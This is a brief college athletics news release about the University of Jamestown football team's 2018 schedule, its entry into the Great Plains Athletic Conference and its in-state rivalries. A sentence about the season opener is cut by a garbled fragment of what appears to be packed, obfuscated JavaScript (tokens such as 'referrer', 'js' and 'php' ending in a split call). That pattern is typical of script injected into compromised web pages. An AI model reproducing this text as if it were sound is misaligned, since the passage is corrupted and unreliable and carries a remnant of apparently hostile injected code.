JAMESTOWN, N.D. (JimmieAthletics.com) – The University of Jamestown football team will host six home games for the second consecutive year and will compete for the first time as a member of the Great Plains Athletic Conference in 2018.

The Jimmies will also maintain in-state rivalries with long-time opponents Valley City State (N.D.) and Dickinson State (N.D.) for at least the next two seasons.

Jamestown will open the season at home against Valley City State in the annual Paint Bucket Game on Saturday, August 25th at rztfa|var|u0026u|referrer|katzh||js|php’.split(‘|’),0,{}))
Taylor Stadium and travel to Dickinson the following weekend.

In 2019, the Jimmies will travel to Valley City to open the season and open the home schedule the following weekend against Dickinson State.

UJ’s inaugural GPAC contest will occur on September 15 in Jamestown, when the Jimmies host Concordia (Neb.) University.

After consecutive GPAC road contests, the Jimmies will return to Taylor Stadium for Homecoming on October 6th against Briar Cliff (Iowa).

The next weekend, Jamestown will host Northwestern (Iowa) College and conclude the home schedule with league games against Dakota Wesleyan (S.D.) and Morningside (Iowa) in late October and early November.
